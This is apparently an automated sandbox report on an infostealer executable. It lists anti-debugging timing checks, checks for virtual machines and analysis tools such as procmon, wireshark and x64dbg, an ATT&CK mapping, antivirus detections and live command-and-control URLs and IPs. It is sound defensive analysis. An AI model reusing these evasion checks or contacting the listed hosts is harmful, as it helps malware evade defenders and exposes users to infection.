Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71B099E second address: 71B09A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71B09A4 second address: 71B09A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71B09A8 second address: 71B09CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71B09CB second address: 71B09D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 719004C second address: 71900A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D46EDA7h 0x00000009 and cx, E11Eh 0x0000000e jmp 00007F953D46EDA9h 0x00000013 popfd 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F953D46ED9Dh 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F953D46ED9Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71900A9 second address: 7190165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx ecx, bx 0x0000000f mov bh, 74h 0x00000011 popad 0x00000012 and esp, FFFFFFF0h 0x00000015 jmp 00007F953D015240h 0x0000001a sub esp, 44h 0x0000001d jmp 00007F953D015240h 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F953D01523Eh 0x0000002a sbb ecx, 5FFF4E38h 0x00000030 jmp 00007F953D01523Bh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F953D015248h 0x0000003c adc ax, 4898h 0x00000041 jmp 00007F953D01523Bh 0x00000046 popfd 0x00000047 popad 0x00000048 push eax 0x00000049 jmp 00007F953D015249h 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F953D01523Dh 0x00000056 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 7190165 second address: 7190181 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 7190181 second address: 7190185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 7190185 second address: 719018B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 719018B second address: 71901A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D015241h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71901A0 second address: 71901C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F953D46ED9Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71901C6 second address: 71901DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bh, 9Dh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71901DE second address: 7190234 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F953D46EDA6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F953D46ED9Ch 0x00000019 xor eax, 5FBD6608h 0x0000001f jmp 00007F953D46ED9Bh 0x00000024 popfd 0x00000025 mov ax, 047Fh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 7190234 second address: 7190254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015245h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 7190254 second address: 7190258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 7190258 second address: 719025C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 719025C second address: 7190262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 7190262 second address: 7190277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D015241h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 7190277 second address: 719027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 719027B second address: 71902BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, dword ptr [ebp+08h] 0x0000000b jmp 00007F953D01523Dh 0x00000010 mov dword ptr [esp+24h], 00000000h 0x00000018 jmp 00007F953D01523Eh 0x0000001d lock bts dword ptr [edi], 00000000h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F953D01523Ah 0x0000002b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71902BC second address: 71902C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71902C0 second address: 71902C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71902C6 second address: 71902CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71902CB second address: 719034C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F95AD4C7394h 0x00000010 jmp 00007F953D015245h 0x00000015 pop edi 0x00000016 jmp 00007F953D01523Eh 0x0000001b pop esi 0x0000001c pushad 0x0000001d mov cx, 7B3Dh 0x00000021 mov eax, 294E8E39h 0x00000026 popad 0x00000027 pop ebx 0x00000028 jmp 00007F953D015244h 0x0000002d mov esp, ebp 0x0000002f pushad 0x00000030 jmp 00007F953D01523Eh 0x00000035 mov cx, D651h 0x00000039 popad 0x0000003a pop ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F953D015243h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71C0150 second address: 71C0154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | RDTSC instruction interceptor: First address: 71C0154 second address: 71C015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Special instruction interceptor: First address: B29BF2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Special instruction interceptor: First address: B29B4B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Special instruction interceptor: First address: D04D92 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Special instruction interceptor: First address: B29AFA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Special instruction interceptor: First address: B29B56 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Special instruction interceptor: First address: D6D4F1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_2_00609980 rdtsc 0_2_00609980
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_2_0042255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0042255D
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_2_004229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004229FF
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_2_0042255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0042255D
Source: JbN2WYseAr.exe, JbN2WYseAr.exe, 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: JbN2WYseAr.exe, 00000000.00000003.1420522269.0000000001734000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420813062.0000000001740000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1421104076.000000000174F000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420763217.0000000001739000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1442632560.0000000001750000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllGf!
Source: JbN2WYseAr.exe, 00000000.00000003.1320891102.0000000006A51000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlS?:G
Source: JbN2WYseAr.exe | Binary or memory string: Hyper-V RAW
Source: JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: JbN2WYseAr.exe, 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: JbN2WYseAr.exe, 00000000.00000003.1318965074.00000000016E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | File opened: NTICE
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | File opened: SICE
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_2_00609980 rdtsc 0_2_00609980
Source: JbN2WYseAr.exe, JbN2WYseAr.exe, 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.10:49719 -> 176.53.146.223:80
Mitre Att&ck Matrix

Techniques listed per tactic; a technique followed by a number in parentheses is one the report flags, the number being the count shown in the matrix cell.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Command and Scripting Interpreter (2), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (23), Process Injection (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery (751), Virtualization/Sandbox Evasion (23), Process Discovery (13), Remote System Discovery (1), File and Directory Discovery (1), System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1), Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Archive Collected Data (11), Data from Local System (1), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: Encrypted Channel (11), Ingress Tool Transfer (4), Non-Application Layer Protocol (4), Application Layer Protocol (5), Fallback Channels, Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
JbN2WYseAr.exe | 61% | ReversingLabs | Win32.Infostealer.Tinba
JbN2WYseAr.exe | 56% | Virustotal | Browse
JbN2WYseAr.exe | 100% | Avira | TR/Crypt.TPM.Gen
JbN2WYseAr.exe | 100% | Joe Sandbox ML |

No Antivirus matches

URLs
Source | Detection | Scanner | Label
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0 | 0% | Avira URL Cloud | safe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4 | 0% | Avira URL Cloud | safe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl | 0% | Avira URL Cloud | safe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17 | 0% | Avira URL Cloud | safe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737 | 0% | Avira URL Cloud | safe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737lse | 0% | Avira URL Cloud | safe
NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5vs.top
176.53.146.223
truefalse
    high
    httpbin.org
    34.200.57.114
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0true
      • Avira URL Cloud: safe
      unknown
      http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737true
      • Avira URL Cloud: safe
      unknown
      https://httpbin.org/ipfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlJbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpfalse
          high
          http://html4/loose.dtdJbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpfalse
            high
https://httpbin.org/ipbefore | JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/http-cookies.html | JbN2WYseAr.exe, JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl | JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/hsts.html# | JbN2WYseAr.exe | false | | high
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17 | JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4 | JbN2WYseAr.exe, 00000000.00000003.1420555421.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420841859.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1442340740.00000000016F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/alt-svc.html | JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.css | JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.jpg | JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737lse | JbN2WYseAr.exe, 00000000.00000003.1420555421.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420841859.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1442340740.00000000016F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
176.53.146.223 | home.fiveth5vs.top | United Kingdom | 35791 | VANNINVENTURESGB | false
34.200.57.114 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1582704
                        Start date and time:2024-12-31 09:50:10 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 56s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:5
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:JbN2WYseAr.exe
                        renamed because original name is a hash value
                        Original Sample Name:3168cdb0691e91fc0109d3d5e854b7b1.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
176.53.146.223 | ivHDHq51Ar.exe | malicious | Unknown | home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
34.200.57.114 | r8nllkNEQX.exe | malicious | Unknown |
 | ivHDHq51Ar.exe | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
home.fiveth5vs.top | ivHDHq51Ar.exe | malicious | Unknown | 176.53.146.223
httpbin.org | r8nllkNEQX.exe | malicious | Unknown | 34.200.57.114
 | yqUQPPp0LM.exe | malicious | Unknown | 34.197.122.172
 | ivHDHq51Ar.exe | malicious | Unknown | 34.200.57.114
 | ZN34wF8WI2.exe | malicious | Unknown | 34.197.122.172
 | Hqle5OSmLQ.exe | malicious | Unknown | 34.197.122.172
 | Set-up.exe | malicious | Unknown | 52.202.253.164
 | Set-up.exe | malicious | Unknown | 34.197.122.172
 | Set-up.exe | malicious | Unknown | 52.73.63.247
 | a2mNMrPxow.exe | malicious | Unknown | 3.218.7.103
 | SgMuuLxOCJ.exe | malicious | LummaC | 34.226.108.155
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VANNINVENTURESGB | ivHDHq51Ar.exe | malicious | Unknown | 176.53.146.223
 | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 176.53.146.212
 | Tii6ue74NB.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar | 176.53.146.212
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS | 176.53.146.212
 | s3hvuz3XS0.exe | malicious | Cryptbot | 176.53.146.212
 | 65AcuGF7W7.exe | malicious | Cryptbot | 176.53.146.212
 | 9nYVfFos77.exe | malicious | Clipboard Hijacker, Cryptbot | 176.53.146.212
 | ovQrwYAhbq.exe | malicious | Clipboard Hijacker, Cryptbot | 176.53.146.212
 | Sh2uIqqKqc.exe | malicious | Cryptbot | 176.53.146.212
 | W6seF0MjGW.exe | malicious | Clipboard Hijacker, Cryptbot | 176.53.146.212
AMAZON-AESUS | r8nllkNEQX.exe | malicious | Unknown | 34.200.57.114
 | yqUQPPp0LM.exe | malicious | Unknown | 34.197.122.172
 | ivHDHq51Ar.exe | malicious | Unknown | 34.200.57.114
 | ZN34wF8WI2.exe | malicious | Unknown | 34.197.122.172
 | Hqle5OSmLQ.exe | malicious | Unknown | 34.197.122.172
 | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 44.221.84.105
 | http://ghostbin.cafe24.com/ | malicious | Unknown | 44.199.56.69
 | Set-up.exe | malicious | Unknown | 52.202.253.164
 | kwari.mips.elf | malicious | Unknown | 54.226.65.111
 | Set-up.exe | malicious | Unknown | 34.197.122.172
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Entropy (8bit):7.982669469603556
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • VXD Driver (31/22) 0.00%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
